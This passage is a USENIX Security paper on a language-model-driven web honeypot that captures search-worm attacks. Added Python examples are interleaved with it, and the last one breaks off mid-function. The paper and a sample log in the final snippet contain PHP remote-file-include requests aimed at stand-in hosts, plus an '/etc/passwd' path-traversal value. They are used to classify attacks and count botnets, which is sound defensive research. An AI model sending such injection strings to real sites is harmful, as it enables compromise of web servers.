
USENIX Association 17th USENIX Security Symposium 171

To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads

Sam Small, Johns Hopkins University

Joshua Mason, Johns Hopkins University

Fabian Monrose, Johns Hopkins University

Niels Provos, Google Inc.

Adam Stubblefield, Johns Hopkins University

Abstract

We present an automated, scalable method for crafting dynamic responses to real-time network requests. Specifically, we provide a flexible technique based on natural language processing and string alignment techniques for intelligently interacting with protocols trained directly from raw network traffic. We demonstrate the utility of our approach by creating a low-interaction web-based honeypot capable of luring attacks from search worms targeting hundreds of different web applications. In just over two months, we witnessed over 368,000 attacks from more than 5,600 botnets targeting several hundred distinct webapps. The observed attacks included several exploits detected the same day the vulnerabilities were publicly disclosed. Our analysis of the payloads of these attacks reveals the state of the art in search-worm based botnets, packed with surprisingly modular and diverse functionality.

1 Introduction

Automated network attacks by malware pose a significant threat to the security of the Internet. Nowadays, web servers are quickly becoming a popular target for exploitation, primarily because once compromised, they open new avenues for infecting vulnerable clients that subsequently visit these sites. Moreover, because web servers are generally hosted on machines with significant system resources and network connectivity, they can serve as reliable platforms for hosting malware (particularly in the case of server farms), and as such, are enticing targets for attackers [25]. Indeed, lately we have witnessed a marked increase in so-called “search worms” that seek out potential victims by crawling the results returned by malevolent search-engine queries [24, 28]. While this new change in the playing field has been noted for some time now, little is known about the scope of this growing problem.

To better understand this new threat, researchers and practitioners alike have recently started to move towards the development of low-interaction, web-based honeypots [3]. These differ from traditional honeypots in that their only purpose is to monitor automated attacks directed at vulnerable web applications. However, web-based honeypots face a unique challenge—they are ineffective if not broadly indexed under the same queries used by malware to identify vulnerable hosts. At the same time, the large number of different web applications being attacked poses a daunting challenge, and the sheer volume of attacks calls for efficient solutions. Unfortunately, current web-based honeypot projects tend to be limited in their ability to easily simulate diverse classes of vulnerabilities, require non-trivial amounts of manual support, or do not scale well enough to meet this challenge.

A fundamental difference between the type of malware captured by traditional honeypots (e.g., Honeyd [23]) and approaches geared towards eliciting payloads from search-based malware stems from how potential victims are targeted. For traditional honeypots, these systems can be deployed at a network telescope [22], for example, and can simply take advantage of the fact that for random scanning malware, any traffic that reaches the telescope is unsolicited and likely malicious in nature. However, search-worms use a technique more akin to instantaneous hit-list automation, thereby only targeting authentic and vulnerable hosts. Were web-based honeypots to mimic the passive approach used for traditional honeypots, they would likely be very ineffective.

To address these limitations, we present a method for crafting dynamic responses to on-line network requests using sample transcripts from observed network interaction. In particular, we provide a flexible technique based on natural language processing and string alignment techniques for intelligently interacting with protocols trained directly from raw traffic. Though our approach is application-agnostic, we demonstrate its utility with a system designed to monitor and capture automated network attacks against vulnerable web applications, without relying on static vulnerability signatures. Specifically, our approach (disguised as a typical web server) elicits interaction with search engines and, in turn, search worms in the hope of capturing their illicit payload. As we show later, our dynamic content generation technique is fairly robust and easy to deploy. Over a 72-day period we were attacked repeatedly, and witnessed more than 368,000 attacks originating from 28,856 distinct IP addresses.

The attacks target a wide range of web applications, many of which attempt to exploit the vulnerable application(s) via a diverse set of injection techniques. To our surprise, even during this short deployment phase, we witnessed several attacks immediately after public disclosure of the vulnerabilities being exploited. That, by itself, validates our technique and underscores both the tenacity of attackers and the overall pervasiveness of web-based exploitation. Moreover, the relentless nature of these attacks certainly sheds light on the scope of this problem, and calls for immediate solutions to better curtail this increasing threat to the security of the Internet. Lastly, our forensic analysis of the captured payloads confirms several earlier findings in the literature, as well as highlights some interesting insights on the post-infection process and the malware themselves.

The rest of the paper is organized as follows. Section 2 discusses related work. We provide a high-level overview of our approach in Section 3, followed by specifics of our generation technique in Section 4. We provide a validation of our approach based on interaction with a rigid binary protocol in Section 5. Additionally, we present our real-world deployment and discuss our findings in Section 6. Finally, we conclude in Section 7.

2 Related Work

Generally speaking, honeypots are deployed with the intention of eliciting interaction from unsuspecting adversaries. The utility in capturing this interaction has been diverse, allowing researchers to discover new patterns and trends in malware propagation [28], generate new signatures for intrusion-detection systems and Internet security software [16, 20, 31], collect malware binaries for static and/or dynamic analysis [21], and quantify malicious behavior through widespread measurement studies [26], to name a few.

The adoption of virtual honeypots by the security community only gained significant traction after the introduction of low-interaction honeypots such as Honeyd [23]. Honeyd is a popular tool for establishing multiple virtual hosts on a single machine. Though Honeyd has proved to be fairly useful in practice, it is important to recognize that its effectiveness is strictly tied to the availability of accurate and representative protocol-emulation scripts, whose generation can be fairly tedious and time consuming. High-interaction honeypots use a different approach, replying with authentic and unscripted responses by hosting sand-boxed virtual machines running common software and operating systems [11]¹.

A number of solutions have been proposed to bridge the separation of benefits and restrictions that exist between high and low-interaction honeypots. For example, Leita et al. proposed ScriptGen [18, 17], a tool that automatically generates Honeyd scripts from network traffic logs. ScriptGen creates a finite state machine for each listening port. Unfortunately, as the amount and diversity of available training data grows, so does the size and complexity of its state machines. Similarly, RolePlayer (and its successor, GQ [10]) generates scripts capable of interacting with live traffic (in particular, worms) by analyzing series of similar application sessions to determine static and dynamic fields and then replay appropriate responses. This is achieved by using a number of heuristics to remove common contextual values from annotated traffic samples and using byte-sequence alignment to find potential session identifiers and length fields.

While neither of these systems specifically target search-based malware, they represent germane approaches and many of the secondary techniques they introduce apply to our design as well. Also, their respective designs illustrate an important observation—the choice between using a small or large set of sample data manifests itself as a system tradeoff: there is little diversity to the requests recognized and responses transmitted by RolePlayer, thereby limiting its ability to interact with participants whose behavior deviates from the training session(s). On the other hand, the flexibility provided by greater state coverage in ScriptGen comes at a cost to scalability and complexity.

Lastly, since web-based honeypots rely on search engines to index their attack signatures, they are at a disadvantage each time a new attack emerges. In our work, we sidestep the indexing limitations common to static signature web-based honeypots and achieve broad query representation prior to new attacks by proactively generating “signatures” using statistical language models trained on common web-application scripts. When indexed, these signatures allow us to monitor attack behavior conducted by search worms without explicitly deploying structured signatures a priori.

3 High-level Overview

We now briefly describe our system architecture. Its setup follows the description depicted in Figure 1, which is conceptually broken into three stages: pre-processing, classification, and language-model generation. We address each part in turn. We note that although our methodology is not protocol specific, for pedagogical reasons, we provide examples specific to the DNS protocol where appropriate. Our decision to use DNS for validation stems from the fact that validating the correctness of an HTTP response is ill-defined. Likewise, many ASCII-based protocols that come to mind (e.g., HTTP, SMTP, IRC) lack strict notions of correctness and so do not serve as a good conduit to demonstrate the correctness of the output we generate.

Figure 1: Setup consists of three distinct stages conducted in tandem in preparation for deployment.

To begin, we pre-process and sanitize all trace data used for training. Network traces are stripped of transport protocol headers and organized by session into pairs of requests and responses. Any trace entries that correspond to protocol errors (e.g., HTTP 404) are omitted. Next, we group request and response pairs using a variant of iterative k-means clustering with TF/IDF (i.e., term frequency-inverse document frequency) cosine similarity as our distance metric. Formally, we apply a k-medoids algorithm for clustering, which assigns samples from the data as cluster medoids (i.e., centroids) rather than numerical averages. For reasons that should become clear later, pair similarity is based solely on the content of the request samples. Upon completion, we then generate and train a collection of smoothed n-gram language-models for each cluster. These language-models are subsequently used to produce dynamic responses to online requests. However, because message formats may contain session-specific fields, we also post-process responses to satisfy these dependencies whenever they can be automatically inferred. For example, in DNS, a session identifier uniquely identifies each record request with its response.

During a live deployment, online-classification is used to deduce the response that is most similar to the incoming request (i.e., by mapping the response to its best medoid). For instance, a DNS request for an MX record will ideally match a medoid that maps to other MX requests. The medoid with the minimum TF/IDF distance to an online request identifies which language model is used for generating responses. The language models are built in such a way that they produce responses influenced by the training data. The overall process is depicted in Figure 2. For our evaluation as a web-based honeypot (in Section 6), this process is used in two distinct stages: first, when interacting with search engines for site indexing and second, when courting malware.

4 Under the Hood

In what follows, we present more specifics about our design and implementation. Recall that our goal is to provide a technique for automatically providing valid responses to protocol interactions learned directly from raw traffic.

In lieu of semantic knowledge, we instead apply classic pattern classification techniques for partitioning a set of observed requests. In particular, we use the iterative k-medoids algorithm. As our distance metric we choose to forgo byte-sequence alignment approaches that have been previously used to classify similarities between protocol messages (e.g., [18, 9, 6]). As Cui et al. observed, while these approaches are appropriate for classifying requests that only differ parametrically, byte-sequence alignment is ill-suited for classifying messages with different byte-sequences [8]. Therefore, we use TF/IDF cosine similarity as our distance metric.

Intuitively, term frequency-inverse document frequency (TF/IDF) is the measure of a term’s significance to a string or document given its significance among a set of documents (or corpus). TF/IDF is often used in information retrieval for a number of applications including automatic text retrieval and approximate string matching [29]. Mathematically, we compute TF/IDF in the following way: let $\tau_{d_i}$ denote how often the term $\tau$ appears in document $d_i$ such that $d_i \in D$, a collection of documents. Then TF/IDF = TF · IDF where

$$\mathrm{TF} = \sqrt{\tau_{d_i}}$$

and

$$\mathrm{IDF} = \log \frac{|D|}{|\{d_j : d_j \in D \text{ and } \tau \in d_j\}|}$$

Figure 2: Online classification of requests from malware and search engine spiders influences which language model is selected for response generation.

The term-similarity between two strings from the same corpus can be computed by calculating their TF/IDF distance. To do so, both strings are first represented as multi-dimensional vectors. For each term in a string (e.g., word), its TF/IDF value is computed as described previously. Then, for a string with n terms, an n-dimensional vector is formed using these values. The cosine of the angle between two such vectors representing strings indicates a measure of their similarity (hence, its complement is a measure of distance).

In the context of our implementation, terms are delineated by tokenizing requests into the following classes: one or more spaces, one or more printable characters (excluding spaces), and one or more non-printable characters (also excluding spaces).² We chose the space character as a primary term delimiter due to its common occurrence in text-based protocols; however, the delimiter could have easily been chosen automatically by identifying the most frequent byte in all requests. The collection of all requests (and their constituent terms) form the TF/IDF corpus.

Once TF/IDF training is complete we use an iterative k-medoids algorithm, shown in Algorithm 1, to identify similar requests. Upon completion, the classification algorithm produces a k (or less) partitioning over the set of all requests. In an effort to rapidly classify online requests in a memory-efficient manner, we retain only the medoids and dissolve all clusters. For our deployment, we empirically choose k = 30, and then perform a trivial cluster-collapsing algorithm: we iterate through the k clusters and, for each cluster, calculate the mean and standard deviation of the distance between the medoid and the other members of the cluster. Once the k-means and standard deviations are known, we collapse pairs of clusters if the medoid requests are no more than one standard deviation apart.
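The TF/IDF distance and the medoid lookup used for online classification can be sketched as follows. This is an added example, not the authors' code: the class and function names, the model labels and the four HTTP requests are constructed for illustration, and ignoring terms never seen in training is an assumption.

```python
import math
import re
from collections import Counter

# Token classes from the text: runs of spaces, runs of printable non-space
# bytes, and runs of non-printable bytes.
TOKEN_RE = re.compile(rb" +|[\x21-\x7e]+|[^\x20-\x7e]+")


def tokenize(request):
    return TOKEN_RE.findall(request)


class TfIdfCorpus:
    """TF/IDF weights with TF = sqrt(count) and IDF = log(|D| / df)."""

    def __init__(self, requests):
        self.n_docs = len(requests)
        self.doc_freq = Counter()
        for req in requests:
            self.doc_freq.update(set(tokenize(req)))

    def vector(self, request):
        vec = {}
        for term, count in Counter(tokenize(request)).items():
            df = self.doc_freq.get(term, 0)
            if df == 0:
                continue  # assumption: terms unseen in training carry no weight
            vec[term] = math.sqrt(count) * math.log(self.n_docs / df)
        return vec

    def distance(self, a, b):
        """Complement of the cosine similarity of the two TF/IDF vectors."""
        va, vb = self.vector(a), self.vector(b)
        dot = sum(w * vb.get(t, 0.0) for t, w in va.items())
        na = math.sqrt(sum(w * w for w in va.values()))
        nb = math.sqrt(sum(w * w for w in vb.values()))
        if na == 0.0 or nb == 0.0:
            return 1.0  # nothing informative to compare
        return 1.0 - dot / (na * nb)


# Constructed training requests (two per application).
A1 = b"GET /shop/view.php HTTP/1.0\r\nUser-Agent: lwp/1.0\r\n\r\n"
A2 = b"GET /shop/view.php HTTP/1.0\r\nUser-Agent: Wget/1.10\r\n\r\n"
B1 = b"POST /blog/rpc.php HTTP/1.1\r\nContent-Type: text/xml\r\n\r\n"
B2 = (b"POST /blog/rpc.php HTTP/1.1\r\nContent-Type: text/xml\r\n"
      b"User-Agent: Wget/1.10\r\n\r\n")
CORPUS = TfIdfCorpus([A1, A2, B1, B2])

# After clustering only the medoids are kept; each one selects a language model.
MEDOIDS = {A1: "lm_shop", B1: "lm_blog"}


def classify(request, corpus=CORPUS, medoids=MEDOIDS):
    """Return the language model of the medoid nearest to an online request."""
    best = min(medoids, key=lambda m: corpus.distance(request, m))
    return medoids[best]
```

Terms that occur in every training request (the space and CRLF tokens here) get an IDF of zero, so only the distinguishing tokens of a request decide which medoid it maps to.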

4.1 Dynamic Response Generation

Since one of the goals of our method is to generate not only valid but also dynamic responses to requests, we employ natural language processing (NLP) techniques to create models of protocols. These models, termed language models, assign probabilities of occurrence to sequences of tokens based on a corpus of training data. With natural languages such as English we might define a token or, more accurately, a 1-gram as a string of characters (i.e., a word) delimited by spaces or other punctuation. However, given that we are not working with natural languages, we define a new set of delimiters for protocols. The 1-gram token in our model adheres to one of the following criteria: (1) one or more spaces, (2) one or more printable characters, (3) one or more non-printable characters, or (4) the beginning of message (BOM) or end of message (EOM) tokens.

The training corpora we use contain both requests and responses. Adhering to our assumption that similar requests have similar responses, we train k response language models on the responses associated with each of the k request clusters. That is, each cluster’s response language model is trained on the packets seen in response to the requests in that cluster. Recall that to avoid having to keep every request cluster in memory, we keep only the medoids for each cluster. Then, for each (request, response) tuple, we recalculate the distance to each of the k request medoids. The medoid with the minimal distance to the tuple’s request identifies which of the k language models is trained using the response. After training concludes, each of the k response language models has a probability of occurrence associated with each observed sequence of 1-grams. A sequence of two 1-grams is called a 2-gram, a sequence of three 1-grams is called a 3-gram, and so on. We cut the maximum n-gram length, n, to eight.

    MedoidSet ← SelectKRandomElements(ObservedRequests)
    RequestMap<RequestType, MedoidType> ← ⊥    // for mapping requests to medoids
    repeat
        for all R ∈ (ObservedRequests − MedoidSet) do
            for all M ∈ MedoidSet do
                Distance ← TF/IDF(R, M)
                if RequestMap[R] = ⊥ or Distance < TF/IDF(RequestMap[R], M) then
                    RequestMap[R] ← M
        for all M ∈ MedoidSet do
            M ← FindMemberWithLowestMeanDistance(M, RequestMap)
    until HasConverged(MedoidSet)
    for all (M_i, M_j) ∈ MedoidSet s.t. i ≠ j do
        if TF/IDF(M_i, M_j) < FindThresholdDistance(M_i, M_j) then
            MedoidSet ← MedoidSet − {M_i, M_j}
            MedoidSet ← MedoidSet ∪ Merge(M_i, M_j, RequestMap)

Algorithm 1: Iterative k-Medoids Classification for Observed Requests

Since it is unlikely that we have witnessed every possible n-gram during training, we use a technique called smoothing to lend probability to unobserved sequences. Specifically, we use parametric Witten-Bell back-off smoothing [30], which is the state of the art for n-gram models. This smoothing method estimates, if we consider 3-grams, the 3-gram probability by interpolating between the naive count ratio $C(w_1 w_2 w_3)/C(w_1 w_2)$ and a recursively smoothed probability estimate of the 2-gram probability $P(w_3 \mid w_2)$. The recursively smoothed probabilities are less vulnerable to low counts because of the shorter context. A 2-gram is more likely to occur in the training data than a 3-gram and the trend progresses similarly as the n-gram length decreases. By smoothing, we get a reasonable estimate of the probability of occurrence for all possible n-grams even if we have never seen it during training. Smoothing also mitigates the possibility that certain n-grams dominate in small training corpora. It is important to note that during generation, we only consider the states seen in training.

To perform the response generation, we use the language models to define a Markov model. This Markov model can be thought of as a large finite state machine where each transition occurs based on a transition probability rather than an input. As well, each “next state” is conditioned solely on the previous state. The transition probability is derived directly from the language models. The transition probability from a 1-gram, $w_1$, to a 2-gram, $w_1 w_2$, is $P(w_2 \mid w_1)$, and so on. Intuitively, generation is accomplished by conducting a probabilistic simulation from the start state (i.e., BOM) to the end state (i.e., EOM).

More specifically, to generate a response, we perform a random walk on the Markov model corresponding to the identified request cluster. From the BOM state, we randomly choose among the possible next states with the probabilities present in the language model. For instance, if the letters (B, C, D) can follow A with probabilities (70%, 20%, 10%) respectively, then we will choose the AB path approximately 70% of the time and similarly for AC and AD. We use this random walk to create responses similar to those seen in training not only in syntax but also in frequency. Ideally, we would produce the same types of responses with the same frequency as those seen during training, but the probabilities used are at the 1-gram level and not the response packet level.
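The random walk from BOM to EOM can be illustrated with a small n-gram model. This is an added example, not the authors' implementation: it uses plain count ratios rather than Witten-Bell smoothing (generation only visits states seen in training), and the class name, the order of 3 and the two HTTP responses are constructed for illustration.

```python
import random
import re
from collections import Counter, defaultdict

# Sentinels are str objects so they can never collide with bytes tokens.
BOM, EOM = "<BOM>", "<EOM>"
TOKEN_RE = re.compile(rb" +|[\x21-\x7e]+|[^\x20-\x7e]+")


def tokenize(message):
    return TOKEN_RE.findall(message)


class ResponseModel:
    """Counts of 'next token' for every context of up to order-1 tokens."""

    def __init__(self, order=3):
        if order < 2:
            raise ValueError("order must be at least 2")
        self.order = order
        self.counts = defaultdict(Counter)

    def train(self, token_sequences):
        for tokens in token_sequences:
            seq = [BOM] + list(tokens) + [EOM]
            for i in range(1, len(seq)):
                context = tuple(seq[max(0, i - (self.order - 1)):i])
                self.counts[context][seq[i]] += 1

    def probs(self, context):
        """Transition probabilities out of a context (empty if never seen)."""
        seen = self.counts.get(tuple(context), {})
        total = sum(seen.values())
        return {tok: n / total for tok, n in seen.items()}

    def generate(self, rng, max_tokens=200):
        """Random walk from BOM until EOM is drawn or the length guard trips."""
        out = [BOM]
        while len(out) <= max_tokens:
            nxt = self.probs(out[-(self.order - 1):])
            if not nxt:
                break
            tok = rng.choices(list(nxt), weights=list(nxt.values()))[0]
            if tok is EOM:
                break
            out.append(tok)
        return out[1:]


# Constructed responses for one request cluster.
TRAINING_RESPONSES = [
    b"HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n<html>forum index</html>",
    b"HTTP/1.1 200 OK\r\nServer: nginx\r\n\r\n<html>forum login</html>",
]


def build_model(order=3):
    model = ResponseModel(order)
    model.train(tokenize(r) for r in TRAINING_RESPONSES)
    return model


def sample_response(model, seed):
    return b"".join(model.generate(random.Random(seed)))
```

Because the server name and the page body are chosen at independent branch points, the walk can emit responses such as an Apache header followed by the login page that never occurred in training, while every 3-gram it contains did.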

The Markov models used to generate responses attempt to generate valid responses based on the training data. However, because the training is over the entire set of responses corresponding to a cluster, we cannot recognize contextual dependencies between requests and responses. Protocols will often have session identifiers or tokens that necessarily need to be mirrored between request and response. DNS, for instance, has a two byte session identifier in the request that needs to appear in any valid response. As well, the DNS name or IP requested also needs to appear in the response. While the NLP engine will recognize that some session identifier and domain name should occupy the correct positions in the response, it is unlikely that the correct session identifier and name will be chosen. For this reason, we automatically post-process the NLP generated response to appropriately satisfy contextual dependencies.


Figure 3: A sliding window template traverses request tokens to identify variable-length tokens that should be reproduced in related responses.

4.1.1 Detecting Contextual Dependencies

Generally speaking, protocols have two classes of contextual dependencies: invariable length tokens and variable length tokens. Invariable length tokens are, as the name implies, tokens that always contain the same number of bytes. For the most part, protocols with variable length tokens typically adhere to one of two standards: tokens preceded by a length field and tokens separated using a special byte delimiter. Overwhelmingly, protocols use length-preceded tokens (DNS, Samba, Netbios, NFS, etc.). The other, less-common type (as in HTTP) employs variable length delimited tokens.

Our method for handling each of these token types differs only slightly from techniques employed by other active responder and protocol disassembly techniques ([8, 9]). Specifically, we identify contextual dependencies using two techniques. First, we apply the Needleman-Wunsch string alignment algorithm [19] to align requests with their associated responses during training. Since the language models we use are not well suited for this particular task, this process is used to identify if, and where, substrings from a request also appear in its response. If certain bytes or sequences of bytes match over an empirically derived threshold (80% in our case), these bytes are considered invariable length tokens and the byte positions are copied from request to response after the NLP generation phase.

Figure 4: Frequency of dominant type/class per request cluster (with k = 30), sorted from least to most accurate.

To identify variable length tokens, we make the simplifying assumption that these types of tokens are preceded by a length identifier; we do so primarily because we are unaware of any protocols that contain contextual dependencies between request and response through character-delimited variable length tokens. As depicted in Figure 3, we iterate over each request and consider each set of up to four bytes as a length identifier if and only if the token that follows it belongs to a certain character class³ for the described length. In our example, Token_i is identified as a candidate length-field based upon its value. Since the next immediate token is of the length described by Token_i (i.e., 8), Token_j is identified as a variable length token. For each variable length token discovered, we search for the same token in the observed response. We copy these tokens after NLP generation if and only if this matching behavior was common to more than half of the request and response pairs observed throughout training.
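The sliding-window search for length-prefixed tokens and the "more than half of the training pairs" rule can be sketched as below. This is an added example, not the authors' code: the character class (printable, non-space ASCII), big-endian length fields, the minimum token length of 2 and the reading of "matching behavior" as "every discovered token reappears in the response" are assumptions, and the DNS messages are constructed.

```python
import struct

# Assumed character class; the paper's footnote defining it is not on this page.
PRINTABLE = frozenset(range(0x21, 0x7F))


def find_length_prefixed(msg, max_width=4, min_len=2):
    """Return (offset, field_width, token) for each length-prefixed token."""
    found, i = [], 0
    while i < len(msg):
        hit = None
        # A field with a leading zero byte is the same as a narrower field
        # starting one byte later, so zero bytes never start a candidate.
        if msg[i] != 0:
            for width in range(1, max_width + 1):
                if i + width > len(msg):
                    break
                n = int.from_bytes(msg[i:i + width], "big")
                token = msg[i + width:i + width + n]
                if n >= min_len and len(token) == n and PRINTABLE.issuperset(token):
                    hit = (i, width, token)
                    break
        if hit:
            found.append(hit)
            i += hit[1] + len(hit[2])  # continue after the token
        else:
            i += 1
    return found


def pair_mirrors(request, response):
    """True if the request has such tokens and all of them recur in the response."""
    tokens = [tok for _, _, tok in find_length_prefixed(request)]
    return bool(tokens) and all(tok in response for tok in tokens)


def mirroring_enabled(pairs):
    """Copy tokens after generation only if most training pairs mirror them."""
    matches = sum(pair_mirrors(req, resp) for req, resp in pairs)
    return matches * 2 > len(pairs)


# --- constructed DNS sample data ---
def qname(name):
    return b"".join(bytes([len(label)]) + label for label in name.split(b".")) + b"\x00"


def dns_query(txid, name, qtype):
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + qname(name) + struct.pack(">HH", qtype, 1)


def dns_reply(query, echo_question=True):
    if not echo_question:  # error reply carrying only a header
        return query[:2] + struct.pack(">HHHHH", 0x8181, 0, 0, 0, 0)
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 60, 4) + bytes([192, 0, 2, 1])
    return query[:2] + struct.pack(">HHHHH", 0x8180, 1, 1, 0, 0) + query[12:] + answer


SAMPLE_QUERY = dns_query(0x1A2B, b"example.com", 15)
QUERIES = [
    SAMPLE_QUERY,
    dns_query(0x1234, b"mail.honeypot.test", 1),
    dns_query(0x0A0B, b"www.example.org", 1),
]
TRAINING_PAIRS = [
    (QUERIES[0], dns_reply(QUERIES[0])),
    (QUERIES[1], dns_reply(QUERIES[1])),
    (QUERIES[2], dns_reply(QUERIES[2], echo_question=False)),
]
```

Two of the three constructed pairs echo the queried name, so `mirroring_enabled(TRAINING_PAIRS)` holds and the labels found in a live request would be copied into the generated response.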

As an aside, the content-length header field in our HTTP responses also needs to accurately reflect the number of bytes contained in each response. If the value of this field is greater than the number of bytes in a response, the recipient will poll for more data, causing transactions to stall indefinitely. Similarly, if the value of the content-length field is less than the number of bytes in the response, the recipient will prematurely halt and truncate additional data. While other approaches have been suggested for automatically inferring fields of this type, we simply post-process the generated HTTP response and automatically set the content-length value to be the number of bytes after the end-of-header character.

5 Validation

In order to assess the correctness of our dynamic response generation techniques, we validate our overall approach in the context of DNS. Again, we reiterate that our choice for using DNS in this case is because it is a rigid binary protocol, and if we can correctly generate dynamic responses for this protocol, we believe it aptly demonstrates the strength (and soundness) of our approach. For our subsequent evaluation, we train our DNS responder off a week’s worth of raw network traces collected from a public wireless network used by approximately 50 clients. The traffic was automatically partitioned into request and response tuples as outlined in Section 4.

Figure 5: Frequency of dominant type/class per response cluster (with k = 30), sorted from least to most accurate.

To validate the output of our clustering technique, we consider clustering of requests successful if for each cluster, one type of request (A, MX, NS, etc.) and the class of the request (IN) emerges as the most dominant member of the cluster; a cluster with one type and one class appearing more frequently than any other is likely to correctly classify an incoming request and, in turn, generate a response to the correct query type and class. We report results based on using 10,000 randomly selected flows for training. As Figures 4 and 5 show, nearly all clusters have a dominating type and class.

To demonstrate our response generation’s success rate, we performed 20,000 DNS requests on randomly generated domain names (of varying length). We used the UNIX command host⁴ to request several types of records. For validation purposes, we consider a response as strictly faithful if it is correctly interpreted by the requesting program with no warnings or errors. Likewise, we consider a response as valid if it processes correctly with or without warnings or errors. The results are shown in Figure 6 for various training flow sizes. Notice that we achieve a high success rate with as little as 5,000 flows, with correctness ranging between 89% and 92% for strictly faithful responses, and over 98% accuracy in the case of valid responses.

In summary, this demonstrates that the overall design depicted in Figures 1 and 2—that embodies our training phase, classification phase, model generation, and preposing phase to detect contextual dependencies and correctly mirror the representative tokens in their correct location(s)—produces faithful responses. More importantly, these responses are learned automatically, and require little or no manual intervention. In what follows, we further substantiate the utility of our approach in the context of a web-based honeypot.

Figure 6: Faithful, valid, or erroneous response success rate for 20,000 random DNS requests under different numbers of training flows. [Bar chart; y-axis: success rate from 0 to 1; x-axis: record types A, MX and NS at 1,000, 5,000 and 10,000 training flows; series: Valid, Faithful.]

6 Evaluation

Our earlier assertion was that the exploitation of web-apps now poses a serious threat to the Internet. In order to gauge the extent to which this is true, we used our dynamic generation techniques to build a lightweight HTTP responder — in the hope of snatching attack traffic targeted at web applications. These attackers query popular search engines for strings that fingerprint the vulnerable software and isolate their targets.

Type      Appearances
.PHP      3165
.PL       29
.CGI      49
.HTML     15
.PHTML    2

Table 1: Query Types

With this in mind, we obtained a list of 3,285 of the most searched queries on Google by known botnets attempting to exploit web applications.⁵ We then queried Google for the top 20 results associated with each query. Although there are several bot queries that are ambiguous and are most likely not targeting a specific web application, most of the queries were targeted. However, automatically determining the number of different web applications being attacked is infeasible, if not impossible. For this reason, we provide only the breakdown in the types of web applications being exploited (i.e., PHP, Perl, CGI, etc.) in Table 1.

Nearly all of the bots searching for these queries exploit command injection vulnerabilities. The PHP vulnerabilities are most commonly exploited through remote inclusion of a PHP script, while the Perl vulnerabilities are usually exploited with UNIX delimiters and commands. Since CGI/HTML/PHTML can house programs from many different types of underlying languages, they encompass a wide range of exploitation techniques. The collected data contains raw traces of the interactions seen when downloading the pages for each of the returned results. Our corpus contained 178,541 TCP flows, of which we randomly selected 24,000 flows as training data for our real-world deployment (see Section 6.1).

Since our primary goal here is to detect (and catch) bots using search engines to query strings present in vulnerable web applications, our responder must be in a position to capture these prey — i.e., it has to be broadly indexed by multiple search engines. To do so, we first created links to our responder from popular pages,⁶ and then expedited the indexing process by disclosing the existence of a minor bug in a common UNIX application to the Full-Disclosure mailing list. The bug we disclosed cannot be leveraged for privilege escalation. Bulletins from Full-Disclosure are mirrored on several high-ranking websites and are crawled extensively by search-engine spiders; less than a few hours later, our site appeared in search results on two prominent search engines. And, right on cue, the attacks immediately followed.

6.1 Real-World Deployment

For our real-world evaluation, we deployed our system on a 3.0 GHz dual-processor Intel Xeon with 8 GB of RAM. At runtime, memory utilization peaked at 960 MB of RAM when trained with 24,000 flows. CPU utilization remained at negligible levels throughout operation and on average, requests are satisfied in less than a second. Because our design was optimized to purposely keep all data in RAM during runtime, disk access was unnecessary.

Shortly after becoming indexed, search-worms began to attack at an alarming rate, with the attacks rapidly increasing over a two month deployment period. During that time, we also recorded the number of indexes returned by Google per day (which totaled just shy of 12,000 during the deployment). We choose to only show PHP attacks because of their prominence. Figure 7 depicts the number of attacks we observed per day. For reference, we provide annotations of our Google index count in ten day intervals until the indices plateau.

Figure 7: Daily PHP attacks. The valley on day 44 is due to an 8 hr power outage. The peak on day 56 is because two bots launched over 2,000 unique script attacks.

For ease of exposition, we categorize the observed attacks into four groups. The first denotes the number of attacks targeting vulnerabilities that have distinct file structures in their names. The class “Unique PHP attacks”, however, is more refined and represents the number of attacks against scripts but using unique injection variables (i.e., index.php?page= and index.php?inc=). The reason we do so is that the file names and structures can be ubiquitous and so by including the variable names we glean insights into attacks against potentially distinct vulnerabilities. We also attempt to quantify the number of distinct botnets involved in these attacks. While many botnets attack the same application vulnerabilities, (presumably) these botnets can be differentiated by the PHP script(s) they remotely include. Recall that a typical PHP remote-include exploit is of the form “vulnerable.php?variable=http://site.com/attack_script?”, and in practice, botnets tend to use disjoint sites to store attack scripts. Therefore, we associate bots with a particular botnet by identifying unique injection script repositories. Based on this admittedly loose notion of uniqueness [27], we observed attacks from 5,648 distinct botnets. Lastly, we record the number of unique IP addresses that attempt to compromise our responder.
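The four tallies described above can be computed from a responder's request log as sketched here. This is an added example, not the authors' code: the log entries are constructed, and using the host name of the injected URL as the repository key (and the scheme list) is an assumption.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed (source IP, request target) pairs; not data from the deployment.
SAMPLE_LOG = [
    ("192.0.2.10", "/index.php?page=http://repo-a.example/id.txt?"),
    ("192.0.2.10", "/index.php?inc=http://repo-a.example/id.txt?"),
    ("192.0.2.11", "/gallery/gallery.php?lib_path=http://repo-a.example/id.txt?"),
    # Percent-encoded value with a mixed-case host name.
    ("198.51.100.7", "/index.php?page=http%3A%2F%2FREPO-B.example%2Fbot.txt%3F"),
    ("198.51.100.7", "/forum/viewtopic.php?t=42"),         # ordinary request
    ("203.0.113.5", "/index.php?page=../../etc/passwd"),   # local path, not a remote include
    ("203.0.113.5", "/index.php?page=ftp://repo-b.example/bot.txt"),
]

# Assumption: URL schemes counted as a remote include.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def _split(url):
    """urlsplit() that returns None instead of raising on malformed input."""
    try:
        return urlsplit(url)
    except ValueError:  # e.g. an unterminated IPv6 literal such as http://[bad
        return None


def remote_includes(request_target):
    """Yield (script, variable, repository) for each query variable whose
    value is a remote URL, i.e. the vulnerable.php?variable=http://site/... form."""
    parts = _split(request_target)
    if parts is None:
        return
    # parse_qsl percent-decodes names and values for us.
    for variable, value in parse_qsl(parts.query, keep_blank_values=True):
        injected = _split(value.strip())
        if injected is None or injected.scheme not in REMOTE_SCHEMES:
            continue
        if injected.hostname:  # hostname is already lower-cased by urlsplit
            yield parts.path, variable, injected.hostname


def summarize(log):
    """Tally the four groups: distinct scripts, unique PHP attacks
    (script + injection variable), botnets (distinct repositories), unique IPs."""
    scripts, php_attacks, ips = set(), set(), set()
    botnet_ips = defaultdict(set)  # repository host -> source IPs that used it
    total = 0
    for ip, target in log:
        for script, variable, repo in remote_includes(target):
            total += 1
            scripts.add(script)
            php_attacks.add((script, variable))
            botnet_ips[repo].add(ip)
            ips.add(ip)
    return {
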